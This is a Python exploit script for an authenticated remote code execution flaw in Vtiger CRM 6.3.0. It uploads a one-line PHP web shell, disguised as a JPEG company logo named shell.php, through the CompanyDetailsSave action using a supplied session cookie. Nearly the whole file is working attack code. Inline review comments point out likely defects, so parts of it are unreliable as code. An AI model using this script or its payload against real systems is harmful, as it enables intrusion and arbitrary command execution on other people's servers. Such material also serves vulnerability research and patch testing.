#!/usr/bin/env python | |
""" | |
Vtiger CRM 6.3.0 - Authenticated Remote Code Execution | |
Version: 6.3.0 (and lower) | |
Tested on: Linux (Ubuntu) | |
CVE: CVE-2015-6000 | |
""" | |
from __future__ import print_function | |
import argparse | |
import sys | |
import io | |
import random | |
try: | |
import httplib | |
except ImportError: | |
import http.client as httplib | |
def payload():
    """Return the default content for the uploaded file.

    The literal is a one-line PHP snippet that hands the ``cmd`` query
    parameter to shell_exec(); ``--payload`` on the command line replaces
    it (see argument_parser()).
    """
    return '<? echo shell_exec($_GET[\'cmd\']); ?>'
def argument_parser():
    """Parse the command-line options and return the argparse namespace.

    Options:
      --host     required; passed to httplib.HTTPConnection by exploit()
      --port     int, defaults to 80
      --payload  defaults to payload(), evaluated once while the parser is built
      --cookie   required; exploit() sends it verbatim as the Cookie header
    """
    parser = argparse.ArgumentParser()
    options = (
        ('--host', dict(required=True, help='Target host')),
        ('--port', dict(default=80, type=int, help='Target port')),
        ('--payload', dict(default=payload(), help='Custom payload')),
        ('--cookie', dict(required=True, help='Authorized cookies')),
    )
    for flag, spec in options:
        parser.add_argument(flag, **spec)
    # parse_args() with no argument list reads sys.argv[1:] itself.
    return parser.parse_args()
class UserAgent(object):
    """Static pool of browser User-Agent strings.

    exploit() picks one with random.choice(UserAgent.list) for the request
    header. NOTE: the attribute name ``list`` shadows the builtin inside this
    class body; it is only read through the class and never rebound in this
    file.
    """
    # Class-level constant data; each entry is sent verbatim as a header value.
    list = [
        'Opera/7.50 (Windows XP; U)',
        'Opera/9.25 (Windows NT 6.0; U; en)',
        'Opera/7.51 (Windows NT 5.1; U) [en]',
        'Mozilla/4.8 [en] (Windows NT 6.0; U)',
        'Mozilla/4.8 [en] (Windows NT 5.1; U)',
        'Mozilla/4.0 (compatible; MSIE 5.15; Mac_PowerPC)',
        'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
        'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) Safari/125.8',
        'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) Safari/85.8',
        'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90)',
        'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.0',
        'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) OmniWeb/v563.15'
    ]
class MultiPartForm(object):
    """
    Accumulate the data to be used when posting a form. Original:
    https://blog.thesparktree.com/the-unfortunately-long-story-dealing-with

    Fields queued with add_field() and files queued with add_file() are
    serialised by get_binary() into one multipart/form-data body; the
    boundary string is fixed in __init__ and advertised by get_content_type().
    """
    def __init__(self):
        # (name, value) pairs, emitted in insertion order.
        self.form_fields = []
        # (fieldname, filename, content_type, content) tuples, emitted after the fields.
        self.files = []
        # Fixed boundary; no check that it is absent from the field/file contents.
        self.boundary = '---------------------------51732462825208'
    def get_content_type(self):
        """Return the Content-Type header value that announces the boundary."""
        return 'multipart/form-data; boundary=%s' % self.boundary
    def add_field(self, name, value):
        """Queue a plain form field."""
        self.form_fields.append((name, value))
    def add_file(self, fieldname, filename, content):
        """Queue a file part.

        The part is always labelled image/jpeg regardless of ``content``;
        the caller chooses ``filename``.
        """
        self.files.append((fieldname, filename, 'image/jpeg', content))
    def get_binary(self):
        """Serialise the queued parts and return the io.BytesIO (not its bytes).

        NOTE(review): every write() below passes a str. On Python 2 str is
        bytes, so this works; on Python 3 io.BytesIO.write() raises TypeError
        for str, so as written the method only runs under Python 2.
        NOTE(review): each part delimiter is written as the bare boundary,
        whereas the closing marker prefixes it with '--' (the form RFC 2046
        uses for delimiters); the two are inconsistent, and a strict
        multipart parser may not see the parts — verify against the target
        server's parser before relying on the encoding.
        """
        binary = io.BytesIO()
        # Tracks whether a part has already been written, so that a CRLF is
        # emitted between parts but not before the first one.
        needsCLRF = False
        # Add the form fields
        for name, value in self.form_fields:
            if needsCLRF:
                binary.write('\r\n')
            needsCLRF = True
            block = [self.boundary,
                     'Content-Disposition: form-data; name="%s"' % name,
                     '',
                     value
                     ]
            binary.write('\r\n'.join(block))
        # Add the files to upload
        for field_name, filename, content_type, body in self.files:
            if needsCLRF:
                binary.write('\r\n')
            needsCLRF = True
            # NOTE: the disposition type here is 'file', not 'form-data' as
            # used for the fields above; str() around the formatted string is a no-op.
            block = [self.boundary,
                     str('Content-Disposition: file; name="%s"; filename="%s"' % \
                         (field_name, filename)),
                     'Content-Type: %s' % content_type,
                     ''
                     ]
            binary.write('\r\n'.join(block))
            # Blank line separating the part headers from the file body.
            binary.write('\r\n')
            binary.write(body)
        # add closing boundary marker,
        binary.write('\r\n--' + self.boundary + '--\r\n')
        return binary
def exploit():
    """Build the CompanyDetailsSave multipart request and POST it to /index.php.

    All inputs come from argument_parser(). Prints a one-line outcome and,
    for any status other than 302, attempts to print the response body.
    """
    args = argument_parser()
    form = MultiPartForm()
    # NOTE(review): __vtrftk is a fixed literal copied into the script and
    # never refreshed from the target; presumably a per-session request
    # token (not verified here).
    form.add_field('__vtrftk', 'sid:c8c896d0d11ba83f6cde923ca4d74161a250d78d,1506431507')
    form.add_field('module', 'Vtiger')
    form.add_field('parent', 'Settings')
    form.add_field('action', 'CompanyDetailsSave')
    form.add_field('saveButton', '')
    # The payload text goes into the 'logo' field under a .php filename;
    # MultiPartForm.add_file() labels it image/jpeg irrespective of content.
    form.add_file('logo', 'shell.php', args.payload)
    body = form.get_binary().getvalue()
    headers = {
        'User-Agent': random.choice(UserAgent.list),
        # Explicit length (int); httplib would compute one itself if omitted.
        'Content-Length': len(body),
        'Cookie': args.cookie,
        'Content-Type': form.get_content_type(),
    }
    # Plain HTTP only, and no timeout is set on the connection.
    connection = httplib.HTTPConnection(args.host, args.port)
    connection.request('POST', '/index.php', body, headers)
    response = connection.getresponse()
    # NOTE(review): closing the connection before reading also closes the
    # response's file object, so response.read() below most likely returns an
    # empty body and the failure diagnostic is lost.
    connection.close()
    # A 302 redirect is taken as the "saved" outcome; anything else counts as failure.
    if response.status == 302:
        print ('[+] exploit upload')
    else:
        print ('[-] exploit can\'t upload')
        print (response.read())
if __name__ == '__main__':
    # Only runs when executed as a script; importing the module defines
    # names but performs no network or argument-parsing work.
    exploit()